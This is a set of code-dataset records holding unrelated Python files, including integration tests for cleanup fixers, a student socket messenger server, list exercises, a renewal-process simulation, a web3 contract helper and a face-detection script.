self.context)\n\n # make the task in progress so that the fixer fixes it\n update_params = {\"task_status.status\":\"in_progress\"}\n self.wfs_access.call_update_task_id(task[\"_id\"], self.context, params=update_params)\n task[\"task_status\"][\"status\"] = \"in_progress\"\n\n tasks.append(task)\n\n # delete one of the test RIRs to make an orphan\n deleted = self.mds_access.call_del_entity(\"retail_input_record\", rir1_id)\n\n # call orphan task fixer, which should FIX IT by archiving the first task and then deleting it\n # it should not touch the second task\n result = self.__run_and_test_orphan_task_fixer()\n\n # try to find the fixed task in archive collection\n archived_params = {\"archived\": True}\n archived_task = self.wfs_access.call_get_task_id(tasks[0][\"_id\"], self.context, archived_params)\n\n # check the IDs match (other tests are in test_wfs_archive_task\n self.test_case.assertEqual(tasks[0][\"_id\"], archived_task[\"original_id\"])\n\n # try to find the task in the normal way, which should raise a 404 error since the task should be missing\n self.test_case.assertRaises(ServiceCallError,\n self.wfs_access.call_get_task_id,\n *(tasks[0][\"_id\"], self.context))\n\n\n # make sure the other task is still there in the regular collection and hasn't been changed\n untouched_task = self.wfs_access.call_get_task_id(tasks[1][\"_id\"], self.context)\n self.test_case.assertEqual(tasks[1], untouched_task)\n\n # try to find the task with an archived search, which should raise a 404 since the untouched task shouldn't have been archived\n 
self.test_case.assertRaises(ServiceCallError,\n self.wfs_access.call_get_task_id,\n *(tasks[1][\"_id\"], self.context, archived_params))\n\n def test_orphan_cci_fixer(self):\n\n # make test companies\n company_id1 = insert_test_company(name=\"ABC\")\n company_id2 = insert_test_company(name=\"Easy as 123\")\n company_id3 = insert_test_company(name=\"Do re mi\")\n company_id4 = insert_test_company(name=\"You and me\")\n\n # pair 'em up\n _ = insert_test_company_competition_instance(company_id1, company_id2)\n _ = insert_test_company_competition_instance(company_id3, company_id4)\n\n # make sure we have CCIs for the pairs\n query = {\n \"$or\":[\n {\"data.pair.entity_id_from\": ensure_id(company_id1), \"data.pair.entity_id_to\": ensure_id(company_id2)},\n {\"data.pair.entity_id_from\": ensure_id(company_id2), \"data.pair.entity_id_to\": ensure_id(company_id1)},\n {\"data.pair.entity_id_from\": ensure_id(company_id3), \"data.pair.entity_id_to\": ensure_id(company_id4)},\n {\"data.pair.entity_id_from\": ensure_id(company_id4), \"data.pair.entity_id_to\": ensure_id(company_id3)}\n ]\n }\n fields = [\"_id\", \"name\", \"data\"]\n params = self.main_params.mds.create_params(resource=\"find_entities_raw\", query=query, entity_fields=fields)[\"params\"]\n ccis = self.main_access.mds.call_find_entities_raw(\"company_competition_instance\", params, self.context)\n\n # should be 4 CCIs\n self.test_case.assertEqual(len(ccis), 4)\n\n # delete one of the companies\n self.main_access.mds.call_del_entity(\"company\", company_id1)\n\n # run orphan cci fixer\n self.__run_and_test_orphan_cci_fixer()\n\n # make sure we have 2 CCIs left; the other two should be deleted\n query = {\n \"$or\":[\n {\"data.pair.entity_id_from\": ensure_id(company_id1), \"data.pair.entity_id_to\": ensure_id(company_id2)},\n {\"data.pair.entity_id_from\": ensure_id(company_id2), \"data.pair.entity_id_to\": ensure_id(company_id1)},\n {\"data.pair.entity_id_from\": ensure_id(company_id3), \"data.pair.entity_id_to\": ensure_id(company_id4)},\n {\"data.pair.entity_id_from\": ensure_id(company_id4), \"data.pair.entity_id_to\": ensure_id(company_id3)}\n ]\n }\n fields = [\"_id\", \"name\", \"data\"]\n params = self.main_params.mds.create_params(resource=\"find_entities_raw\", query=query, entity_fields=fields)[\"params\"]\n ccis = self.main_access.mds.call_find_entities_raw(\"company_competition_instance\", params, self.context)\n\n # should be 2 CCIs\n self.test_case.assertEqual(len(ccis), 2)\n\n\n\n # -------------------------- Private Helpers --------------------------- #\n\n def _verify_rir(self, rir_id, is_most_correct):\n\n # query rir\n query = { \"_id\": rir_id }\n fields = [\"_id\", \"data.is_most_correct\"]\n params = self.main_params.mds.create_params(resource=\"find_entities_raw\", query=query, entity_fields=fields)[\"params\"]\n rir = self.main_access.mds.call_find_entities_raw(\"retail_input_record\", params, self.context)[0]\n\n # sweet\n self.test_case.assertEqual(rir[\"data\"][\"is_most_correct\"], is_most_correct)\n\n\n def _link_rir_to_store(self, rir_id, store_id, is_most_correct=False):\n\n self.main_access.mds.call_add_link(\"retail_input_record\", rir_id, \"retail_input_record\", \"store\", store_id,\n \"store\", \"retail_input\", self.context)\n\n if is_most_correct:\n self.main_access.mds.call_add_link(\"retail_input_record\", rir_id, \"most_correct_record\", \"store\", store_id,\n \"store\", \"retail_input\", self.context)\n\n def __run_and_test_orphan_task_fixer(self):\n\n fixer_task_rec = {\n \"input\": 
{\"scheduled\": False},\n \"meta\": {\"async\": False}\n }\n result = self.main_access.wfs.call_task_new(\"retail_curation\", \"cleanup\", \"orphan_task_fixer\",\n fixer_task_rec, self.context)\n\n self.test_case.assertEqual(result[\"task_status\"][\"status\"], \"stopped\")\n return result\n\n def __run_and_test_orphan_cci_fixer(self):\n\n fixer_task_rec = {\n \"input\": {\"scheduled\": False},\n \"meta\": {\"async\": False}\n }\n result = self.main_access.wfs.call_task_new(\"retail_curation\", \"cleanup\", \"orphan_cci_fixer\",\n fixer_task_rec, self.context)\n\n self.test_case.assertEqual(result[\"task_status\"][\"status\"], \"stopped\")\n return result","repo_name":"erezrubinstein/aa","sub_path":"tests/integration_tests/core_tests/service_tests/implementation/wfs_cleanup_tasks_test_collection.py","file_name":"wfs_cleanup_tasks_test_collection.py","file_ext":"py","file_size_in_byte":9570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35536954058","text":"import statistics\nlista_op1 = list()\nlista_op2 = []\n\nlista_itens = ['eu', 'tu', 'ele', 'nós' 'vós', 'eles']\n\nprint(len(lista_itens))\n\nprimeiro_item = lista_itens[0]\nmeio_item = lista_itens[len(lista_itens)//2]\nultimo_item = lista_itens[-1]\n\nlista_variada = ['Naelson', '20', 1.80, 'Solteiro', 'RN']\n\ncompanhias = ['Facebook', 'Google', 'Microsoft', 'Apple', 'IBM', 'Oracle', 'Amazon']\n\nprint(companhias)\n\nprint(len(companhias))\n\nprimeiro_item = companhias[0]\nmeio_item = companhias[len(companhias)//2]\nultimo_item = companhias[-1]\n\nprint(primeiro_item)\nprint(meio_item)\nprint(ultimo_item)\n\ncompanhias[0] = 'Udemy'\nprint(companhias)\n\ncompanhias.append('Cisco')\n\ncompanhias.insert(len(companhias)//2, 'SpaceX')\n\ncompanhias[0] = 'UDEMY'\n\ncompanhias.remove('IBM')\n\nlista = '#; '.join(companhias)\n\nprint('Oracle' in companhias)\n\ncompanhias.sort()\n\ncompanhias.sort(reverse=True)\n\ncorte_primeiras = companhias[0:3]\n\ncorte_ultimas = companhias[-3:]\n\ndivisao_1 = companhias[0: len(companhias)//2]\ndivisao_2 = companhias[-len(companhias)//2: ]\n\ndel companhias[0]\n\ndel companhias[(len(companhias)//2)]\n\ncompanhias.pop()\n\ncompanhias.clear()\n\ndel companhias\n\nfront_end = ['HTML', 'CSS', 'JS', 'React', 'Redux']\nback_end = ['Node','Express', 'MongoDB']\nfront_end.extend(back_end)\n\nfull_stack = front_end.copy()\n\nfull_stack.insert(5, 'Python')\nfull_stack.insert(6, 'SQL')\n\nidades = [19, 22, 19, 24, 20, 25, 26, 24, 25, 24]\n\nidades.sort()\n\nidades.append(idades[0])\nidades.sort()\nidades.append(idades[-1])\n\nmediana = statistics.median(idades)\n\nmedia = sum(idades)/len(idades)\n\nintervalo_maxmin = abs(idades[0] - idades[-1])\n\nprint(abs(idades[0]-media), abs(idades[-1]-media))\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"devSirNaelC7/30-dias-de-python","sub_path":"05°_Dia_Listas/listas.py","file_name":"listas.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11167802835","text":"#####################################################################\r\n# Messenger Application Server.py\r\n# Written By: Lauren Shirley, Steve Smith\r\n# Date: 4/21/2016\r\n# Description: Receives messages from a client and either\r\n# registers, logs in, adds friends, updates chatlog,\r\n# retrieves friend list and chatlog, and logs off users.\r\n# All requests/response must follow their respective\r\n# format listed below:\r\n#\r\n# Registration request \r\n# 
REGISTER \\t USERID \\t PASSWORD \\t EMAIL \\t FULL NAME\r\n# Registration response \r\n# REGISTRATION_STATUS \\t DETAILS ON STATUS\r\n# Login request\r\n# LOGIN \\t USERID \\t PASSWORD\r\n# Login response\r\n# LOGIN_STATUS \\t STATUS\r\n# Add Friend request\r\n# ADD_FRIEND \\t USERID \\t FRIEND_ID \r\n# Add Friend response\r\n# ADD_FRIEND_STATUS \\t STATUS\r\n# Send Message request\r\n# SEND_MESSAGE \\t FRIEND_ID \\t USERID \\t MESSAGE\r\n# Send Message response\r\n# SEND_MESSAGE_STATUS \\t STATUS\r\n# Chatlog request\r\n# REQUEST_CHATLOG \\t FRIEND_ID \\t USERID\r\n# Chatlog response\r\n# CHATLOG_STATUS \\t STATUS \\t MESSAGES (or FRIEND_ID \\t USERID)\r\n# Get Friends request\r\n# GET_FRIENDS \\t USERID\r\n# Get Friends response\r\n# GET_FRIENDS_RESULTS \\t FRIEND_LIST\r\n# Logoff request\r\n# LOGOFF \\t USERID\r\n# Logoff response\r\n# LOGOFF_STATUS \\t STATUS\r\n#####################################################################\r\n\r\nfrom socket import *\r\nfrom datetime import datetime\r\n\r\n#Create a welcome socket bound at serverPort\r\nserverPort = 12009\r\nserverSocket = socket(AF_INET,SOCK_STREAM)\r\n#serverSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\nserverSocket.bind(('',serverPort))\r\nserverSocket.listen(10)\r\nprint ('The Messenger Application server is ready to receive')\r\naccessTime = datetime.now();\r\nprint(\"Access time is\", accessTime);\r\n\r\nwhile 1:\r\n connectionSocket, addr = serverSocket.accept()\r\n #Wait for the hello message\r\n while 1:\r\n request = connectionSocket.recv(1024).decode('ascii')\r\n print(\"Request message:\", request)\r\n #if request message is blank then break out and close socket\r\n if(request == \"\"):\r\n break\r\n\r\n #save method name to check for type of request\r\n methodName = request.split('\\t')[0].strip()\r\n #print received from information\r\n print(\"From\", addr,methodName)\r\n\r\n #receive hello message and return \r\n if(methodName.upper() == \"HELLO\"):\r\n Request = \"Connection successful!\"\r\n connectionSocket.send(Request.encode())\r\n \r\n #Registration Processing\r\n elif(methodName.upper() == \"REGISTER\"):\r\n #assign each part of message to a variable\r\n userID = request.split('\\t')[1].strip()\r\n password = request.split('\\t')[2].strip()\r\n userFullName = request.split('\\t')[3].strip()\r\n email = request.split('\\t')[4].strip()\r\n RegisterStatus = \"Registration_Status \\tSuccess\\r\\n\"\r\n #check file for existing records\r\n for line in open(\"UserProfile.txt\"):\r\n registeredID = line.split('\\t')[0].strip()\r\n registeredEmail = line.split('\\t')[2].strip()\r\n if(userID==registeredID): #if user name already exists\r\n RegisterStatus = \"Registration_Status \\tUsername already exists. Please try again\\r\\n\"\r\n elif(email==registeredEmail): #if email is registered under a different user name\r\n RegisterStatus = \"Registration_Status \\tRegistration already exists with this email. Please try again\\r\\n\"\r\n if(RegisterStatus != \"Registration_Status \\tSuccess\\r\\n\"):#if user info match any in file send back error\r\n connectionSocket.send(RegisterStatus.encode())\r\n else: #if username does not exist and email not already used\r\n if(len(password) < 6): #make sure password is at least 6 characters\r\n passwordError = \"Registration_Status \\tPassword must be at least 6 characters. 
Please try again\\r\\n\"\r\n connectionSocket.send(passwordError.encode()) #return error\r\n else: #else registration successful, save record and report back to user\r\n #create record to save\r\n NewUserRecord = userID + '\\t' + password + '\\t' + email + '\\t' + userFullName + '\\t' + str(addr) + '\\n'\r\n #append it to the file\r\n register_file = open(\"UserProfile.txt\", \"a\")\r\n register_file.write(NewUserRecord)\r\n register_file.close()\r\n #make entry in status file\r\n status_file = open(\"UserStatus.txt\", \"a\")\r\n status_file.write(userID + '\\t' + 'OFFLINE' + '\\n')\r\n status_file.close()\r\n connectionSocket.send(RegisterStatus.encode())#return registrationstatus\r\n \r\n #Login Processing \r\n elif(methodName.upper() == \"LOGIN\"):\r\n #Assign each part of message to a variable\r\n userID = request.split('\\t')[1].strip()\r\n password = request.split('\\t')[2].strip()\r\n LoginStatus = \"Login_Status \\tFail\\r\\n\"\r\n #check file for correct user information\r\n for line in open(\"UserProfile.txt\"):\r\n registeredID = line.split('\\t')[0].strip()\r\n registeredPassword = line.split('\\t')[1].strip()\r\n if(userID == registeredID and password == registeredPassword):\r\n LoginStatus = \"Login_Status \\tSuccess\\r\\n\"\r\n \r\n #Change status to online\r\n status_file = open(\"UserStatus.txt\", \"r\")\r\n lines = status_file.readlines()\r\n status_file.close()\r\n \r\n status_file = open(\"UserStatus.txt\", \"w\")\r\n for line in lines:\r\n if(line.split('\\t')[0].strip() != userID):\r\n status_file.write(line.rstrip('\\n') + '\\n')\r\n status_file.write(userID + '\\t' + 'ONLINE' + '\\n')\r\n status_file.close()\r\n connectionSocket.send(LoginStatus.encode()) #return loginStatus\r\n \r\n #Add Friend Processing \r\n elif(methodName.upper() == \"ADD_FRIEND\"):\r\n #Assign each part of message to a variable\r\n userName = request.split('\\t')[1].strip()\r\n friendName = request.split('\\t')[2].strip()\r\n friendExists = False\r\n alreadyFriend = False\r\n message = \"\"\r\n #check file for friends username\r\n for line in open(\"UserProfile.txt\"):\r\n tempUser = line.split('\\t')[0].strip()\r\n if(tempUser == friendName):\r\n friendExists = True #friend exists\r\n #check file to see if user is already a friend\r\n for line in open(\"UserFriends.txt\"):\r\n tempUser = line.split('\\t')[0].strip()\r\n if(tempUser == userName):\r\n friend = line.split('\\t')[1].strip()\r\n if(friend == friendName):\r\n alreadyFriend = True #user is already friends with this person\r\n message = \"User is already a friend!\"\r\n if(friendExists == True):\r\n if(alreadyFriend == False):\r\n #add friend\r\n #append it to the file\r\n friends_file = open(\"UserFriends.txt\", \"a\")\r\n friends_file.write(userName + '\\t' + friendName + '\\n')\r\n friends_file.close()\r\n message = \"Success\"\r\n else:\r\n message = \"User does not exist!\"\r\n #send back add friend status\r\n message = \"Add_Friend_Status\" + \"\\t\" + message + \"\\r\\n\"\r\n connectionSocket.send(message.encode())\r\n \r\n #Send Message Processing \r\n elif(methodName.upper() == \"SEND_MESSAGE\"):\r\n #Assign each part of message to a variable\r\n friendID = request.split('\\t')[1].strip()\r\n userID = request.split('\\t')[2].strip()\r\n message = request.split('\\t')[3].strip()\r\n messageStatus = \"Fail\" #initialize as fail \r\n messageFile = open(\"UserChatlog.txt\", \"r\")\r\n #assign lines in file to a variable\r\n lines = messageFile.readlines()\r\n messageFile.close()\r\n #open file to write\r\n messageFile = 
open(\"UserChatlog.txt\", \"w\")\r\n for line in lines:\r\n line = line.rstrip('\\n')\r\n userID1 = line.split('\\t')[0].strip()\r\n userID2 = line.split('\\t')[1].strip()\r\n #if user ids match conversation then add message to current line and change status\r\n if((userID1.upper() == userID.upper() and userID2.upper() == friendID.upper())\r\n or (userID1.upper() == friendID.upper() and userID2.upper() == userID.upper())):\r\n messageFile.write(line + '\\t' + message + '\\n')\r\n messageStatus = \"Success\" \r\n messageFile.close()\r\n #if status is still at fail it means a conversation hasn't been started so append to end of file\r\n if(messageStatus != \"Success\"):\r\n messageFile = open(\"UserChatlog.txt\", \"a\")\r\n messageFile.write(userID + '\\t' + friendID + '\\t' + message + '\\n')\r\n messageFile.close()\r\n messageStatus = \"Success\"\r\n #send back Message status\r\n messageStatus = \"Send_Message_Status \\t\" + messageStatus +'\\r\\n'\r\n connectionSocket.send(messageStatus.encode())\r\n \r\n #Request Chatlog Processing \r\n elif(methodName.upper() == \"REQUEST_CHATLOG\"):\r\n friendID = request.split('\\t')[1].strip()\r\n userID = request.split('\\t')[2].strip()\r\n chatlog_status = \"Fail\" #initialize as fail\r\n for line in open(\"UserChatlog.txt\", \"r\"):\r\n line = line.rstrip('\\n')\r\n userID1 = line.split('\\t')[0].strip()\r\n userID2 = line.split('\\t')[1].strip()\r\n #if user ids match conversation then save message to send\r\n if((userID1.upper() == userID.upper() and userID2.upper() == friendID.upper())\r\n or (userID1.upper() == friendID.upper() and userID2.upper() == userID.upper())):\r\n message = line\r\n chatlog_status = \"Success\" #if found then change to success\r\n #return status and ids and message if found\r\n if(chatlog_status == \"Success\"):\r\n chatlogStatus = \"Chatlog_Status \\t\" + chatlog_status + \"\\t\" + line\r\n else:\r\n chatlogStatus = \"Chatlog_Status \\t\" + chatlog_status + \"\\t\" + friendID + \"\\t\" + userID + \"\\t\" + \"\" + \"\\r\\n\"\r\n connectionSocket.send(chatlogStatus.encode())\r\n \r\n #Get Friends Processing \r\n elif(methodName.upper() == \"GET_FRIENDS\"):\r\n #assign user's ID to variable to help locate friend list\r\n userID = request.split('\\t')[1].strip()\r\n friends = \"\"\r\n #search each line for user ID match and save friends if match found\r\n for line in open(\"UserFriends.txt\"):\r\n line = line.rstrip('\\n')\r\n tempID = line.split('\\t')[0].strip()\r\n friendID = line.split('\\t')[1].strip()\r\n if(userID == tempID):\r\n for line in open(\"UserStatus.txt\"):\r\n tempFID = line.split('\\t')[0].strip()\r\n tempFStatus = line.split('\\t')[1].strip()\r\n if(friendID == tempFID):\r\n friends += friendID + \"\\t\" + tempFStatus + \"\\t\"\r\n #send back results\r\n message = 'GET_FRIENDS_RESULTS' + '\\t' + friends +\"\\r\\n\"\r\n connectionSocket.send(message.encode())\r\n\r\n #Logoff Processing \r\n elif(methodName.upper() == \"LOGOFF\"):\r\n #Assign each part of message to a variable\r\n userID = request.split('\\t')[1].strip()\r\n \r\n #Change status to offline\r\n status_file = open(\"UserStatus.txt\", \"r\")\r\n lines = status_file.readlines()\r\n status_file.close()\r\n \r\n status_file = open(\"UserStatus.txt\", \"w\")\r\n for line in lines:\r\n if(line.split('\\t')[0].strip() != userID):\r\n status_file.write(line.rstrip('\\n') + '\\n')\r\n status_file.write(userID + '\\t' + 'OFFLINE' + '\\n')\r\n status_file.close()\r\n \r\n LogoffStatus = \"Logoff_Status \\tSuccess\\r\\n\"\r\n 
connectionSocket.send(LogoffStatus.encode())\r\n #close connectionSocket \r\n connectionSocket.close()\r\n\r\n","repo_name":"shirleyla10/MessengerApp","sub_path":"Messenger Application Server.py","file_name":"Messenger Application Server.py","file_ext":"py","file_size_in_byte":13028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7729226947","text":"import openpyxl\r\n\r\ndef read_excel_to_dict(file_path):\r\n try:\r\n # Load the Excel workbook\r\n workbook = openpyxl.load_workbook(file_path)\r\n # Select the first sheet (you may need to modify this if your data is in a different sheet)\r\n sheet = workbook.active\r\n # Create a dictionary from the first two columns\r\n result_dict = {}\r\n for row in sheet.iter_rows(min_row=1, max_col=2, values_only=True):\r\n value_list = []\r\n key, value = row\r\n value_list.append(key)\r\n if value == None:\r\n value_list.append('')\r\n else:\r\n value_list.append(value)\r\n result_dict[key] = value_list\r\n return result_dict\r\n except Exception as e:\r\n print(f\"An error occurred: {e}\")\r\n return None\r\n\r\nexcel_file_path = 'C:/Users/SHHEKO/Downloads/datatest.xlsx'\r\nresult_dictionary = read_excel_to_dict(excel_file_path)\r\n","repo_name":"Ahmed3117/webscapper","sub_path":"readexcel.py","file_name":"readexcel.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"7167216133","text":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\ntmax = 10\nn = int(30 * tmax)\ntrials = 10000\n\ndef myplot(average, title, file_name):\n x = np.linspace(0, tmax, n+1)\n plt.figure(figsize = (8,7))\n plt.title(title)\n plt.xlabel('t')\n plt.ylabel('E[N(t)]')\n plt.minorticks_on()\n plt.grid(True, which='major')\n plt.grid(True, which='minor', color='#999999', linestyle = '-', alpha=0.2)\n plt.plot(x, average, drawstyle='steps-post')\n plt.savefig(\"{}.png\".format(file_name))\n # plt.show()\n\ndef estimateENt(interarrivalTime, tmax, n, trials):\n res = np.zeros((n + 1))\n for trial in range(trials):\n current_num = 0\n current_time = 0\n next_interval = interarrivalTime()\n for i in range(n + 1):\n t = i * tmax / n\n if t >= current_time + next_interval:\n current_num = current_num + 1\n current_time = current_time + next_interval\n next_interval = interarrivalTime()\n\n res[i] += current_num\n res = res / trials\n return res\n\n\nmyplot(estimateENt(lambda: 1, tmax, n, trials), 'a) $X_j$ = 1', \"a\")\nmyplot(estimateENt(lambda: 2*np.random.random(), tmax, n, trials), 'b) $X_j$ ~ Uniform(0,2)', \"b\")\nmyplot(estimateENt(lambda: 0.5 + np.random.random(1), tmax, n, trials), 'c) $X_j$ ~ Uniform($\\\\frac{1}{2},\\\\frac{3}{2}$)', \"c\")\nmyplot(estimateENt(lambda: np.random.exponential(1), tmax, n, trials), 'd) $X_j$ ~ Exp($\\lambda$ = 1)', \"d\")\nmyplot(estimateENt(lambda: 1 if np.random.random() < 0.75 else np.random.exponential(1), tmax, n, trials), r'e) $X_j = 1$ w/ prob $\\frac{3}{4}$' \"\\n\" r'~ Exp($\\lambda$ = 1) w/ prob $\\frac{1}{4}$', \"e\")\nmyplot(estimateENt(lambda: 0.5 if np.random.random() < 0.5 else 1.5, tmax, n, trials), r'f) $X_j = \\frac{1}{2}$ w/ prob $\\frac{1}{2}$' \"\\n\" r'= $\\frac{3}{2}$ w/ prob $\\frac{1}{2}$', \"f\")\nmyplot(estimateENt(lambda: 5/6 if np.random.random() < 6/7 else 2, tmax, n, trials), r'g) $X_j = \\frac{5}{6}$ w/ prob $\\frac{6}{7}$' \"\\n\" r'2 w/ prob $\\frac{1}{7}$', \"g\")\nmyplot(estimateENt(lambda: 1/3 if np.random.random() < 
0.461263 else np.pi / 2, tmax, n, trials), r'h) $X_j = \\frac{1}{3}$ w/ prob 46.1263%' \"\\n\" r'$\\frac{\\pi}{2}$ w/ prob 53.8737%', \"h\")\n","repo_name":"onedayatatime0923/Stochastic-Processes","sub_path":"hw4/src/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8233316868","text":"from web3 import Web3\n\nclass Contract():\n\n def __init__(self, abi, bytecode, address = None):\n self.w3 = Web3(Web3.WebsocketProvider('wss://ropsten.infura.io/ws/v3/faa6cd8da8984cc7b95b935d1bede5c7'))\n self.abi = abi\n self.bytecode = bytecode\n self.address = address\n self.object = self.w3.eth.contract(abi = self.abi, bytecode = self.bytecode, address = self.address)\n\n def call(self, name, *args):\n return self.object.functions[name](*args).call()\n\n def send_transaction(self, name, addr, private_key, *args, gas_limit = 1000000, gas_price = 3, unit = 'gwei'):\n build = self.object.functions[name](*args).buildTransaction({\n 'from': addr,\n 'nonce': self.w3.eth.getTransactionCount(addr),\n 'gas': gas_limit,\n 'gasPrice': self.w3.toWei(str(gas_price), unit)\n })\n transaction = self.w3.eth.sendRawTransaction(self.w3.eth.account.signTransaction(build, private_key).rawTransaction)\n print(\"Transaction -> https://ropsten.etherscan.io/tx/{}\".format(transaction.hex()))\n self.w3.eth.waitForTransactionReceipt(transaction)\n\n \naddress = '0x348A4b3D65c0663190cda60e2981D5ae377db446'\nprivate_key = bytes.fromhex('')","repo_name":"JyunD/CTF","sub_path":"NCTU2020/crypto/Get_Started/address.py","file_name":"address.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9304456043","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n # @param A : head node of linked list\n # @return the head node in the linked list\n\n def deleteDuplicates(self, A):\n # import pdb\n # pdb.set_trace()\n head = A\n splice = None\n prev = A\n next = prev.next\n\n while next is not None:\n isRepeat = False\n if prev.val == next.val:\n isRepeat = True\n else:\n splice = prev\n\n while next is not None and prev.val == next.val:\n next = next.next\n \n if isRepeat:\n if splice is None:\n splice = next\n else:\n splice.next = next\n\n if isRepeat and head.val == prev.val:\n head = next\n if next is None:\n return head\n prev = next\n next = prev.next\n return head","repo_name":"karandevgan/Algorithms","sub_path":"RemoveDuplicatesLinkedList.py","file_name":"RemoveDuplicatesLinkedList.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39407379800","text":"import csv\r\n\r\nrows = []\r\n\r\nwith open(\"main3.csv\",\"r\") as f:\r\n csvreader = csv.reader(f)\r\n for row in csvreader:\r\n rows.append(row)\r\n\r\n\r\nplanet_data_rows = rows[1:]\r\n\r\nfinal_list = []\r\nfor star_data in planet_data_rows:\r\n temp_list = {\r\n \"star_name\":star_data[1],\r\n \"distance\":star_data[2],\r\n \"mass\":star_data[3],\r\n \"radius\":star_data[4],\r\n \"gravity\":star_data[5]\r\n }\r\n 
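#append this star's dict to the final list\r\n    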
final_list.append(temp_list)\r\n\r\nprint(final_list)\r\n","repo_name":"san994/pro-136","sub_path":"data_create.py","file_name":"data_create.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13998559903","text":"import nltk\nfrom random import random\n\nimport funs\n\n# If you're runnng this you'll need to download the nltk corups of English words\n# run nltk.download() in a python shell beforehand\n\nword_list = [w for w in nltk.corpus.words.words('en') if len(w) == 5 and w.islower()]\nwords = set(word_list)\n\ndone = False\ngoal = [-1, -1, -1, -1, -1]\nans = [' ', ' ', ' ', ' ', ' ']\nconfirmed = {}\nconfirmed_not = []\nrecs = {}\n\ndef checkDone(word):\n for c in word:\n if c == ' ':\n return False\n return True\n\nstarter = word_list[int(random()*len(word_list))]\n\nprint(\"\\n========= GET LIVE WORDLE RECOMMENDATIONS =========\\n\")\nprint(\" We will give you live wordle recommendations\")\nprint(\" all you have to do is come up with a starting\")\nprint(\" word!\")\nprint()\nprint(\" Need a good starting word? Try: %s\" % (starter))\n\nfuns.initRecs()\ntry:\n while not done:\n print(\"---------------------------------------------------\")\n guess = input(\"Please input your guess: \")\n print(\"Please tell us how your word performed:\")\n print(\"0 - not present\\n1 - present, wrong location\\n2 - present, right location\\n\")\n for i in range(5):\n if (ans[i] == ' '):\n goal[i] = int(input(\"%c - \" % (guess[i])))\n else:\n print(\"%c - CONFIRMED\" % ans[i])\n continue\n if goal[i] == 2:\n ans[i] = guess[i]\n if guess[i] in confirmed_not:\n confirmed_not.pop(confirmed_not.index(guess[i]))\n if goal[i] == 1:\n if (guess[i] not in confirmed):\n confirmed[guess[i]] = [i]\n else:\n confirmed[guess[i]].append(i)\n print(confirmed)\n if goal[i] == 0:\n if ((guess[i] not in confirmed_not) and (guess[i] not in confirmed)):\n confirmed_not.append(guess[i])\n if checkDone(ans):\n print(\"Congrats! You're all done\")\n break\n print(\"---------------------------------------------------\")\n print(\"Alright, here's where we're at:\")\n funs.printWord(ans)\n print(\"Here's the other letters we know are in the word\\nsomewhere:\")\n for c in confirmed:\n if c not in ans:\n print(c, end = \" \")\n print(\"\\n---------------------------------------------------\")\n funs.getRecommendations(confirmed)\n funs.printRecs()\nexcept KeyboardInterrupt:\n print(\"\\n\\nThanks for playing! 
Now shutting down...\\n\")\nfinally:\n    exit(0)","repo_name":"benjamnsmith/little-projects","sub_path":"wordle-project/wordle.py","file_name":"wordle.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31447704767","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n#Usage\n#python face_detector.py --input dataset/TestVideo.mp4 --output output/test_output.avi --display 0\n\n\"\"\"\nCreated on Wed Mar 10 11:21:37 2021\n\n@author: ugot\n\"\"\"\n\nimport numpy as np\nimport cv2\nimport argparse\nimport imutils\n\n'''\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--input\", required=True,\n    help=\"path to input video\")\nap.add_argument(\"-o\", \"--output\", type=str,\n    help=\"path to output video\")\n\nargs = vars(ap.parse_args())\n'''\nface_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')\n\n\nprint(\"[INFO] processing video...\")\nstream = cv2.VideoCapture(\"dataset/TestVideo.mp4\")\nwriter = None\nresults = []\ni = 0\nwhile True:\n    # grab the next frame\n    (grabbed, frame) = stream.read()\n\n    # if the frame was not grabbed, then we have reached the\n    # end of the stream\n    if not grabbed:\n        break\n\n    # convert the input frame from BGR to RGB then resize it to have\n    # a width of 750px (to speedup processing)\n    rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n    #r = frame.shape[1] / float(rgb.shape[1])\n    faces = face_cascade.detectMultiScale(rgb, 1.3, 5)\n    for (x,y,w,h) in faces:\n        frame = cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2)\n        roi = rgb[y:y+h, x:x+w]\n        results.append(roi)\n        path = 'output/img%d.jpg' % (i,)\n        cv2.imwrite(path, roi)\n        i += 1\n\nstream.release()\n\n\n# face crops differ in size, so resize each one to a common shape and flatten it\n# into a feature vector before stacking them into a single array\narray = np.array([cv2.resize(roi, (64, 64)).flatten() for roi in results])\n\n# Clustering algorithm\n# DBSCAN has no predict(); after fit() the cluster label of each sample is in labels_\nfrom sklearn.cluster import DBSCAN\nclusters = DBSCAN(eps=3, min_samples=6).fit(array)\nlabels = clusters.labels_\nprint(labels)\n\n","repo_name":"parallelscore/VUFE-Process","sub_path":"Ogban 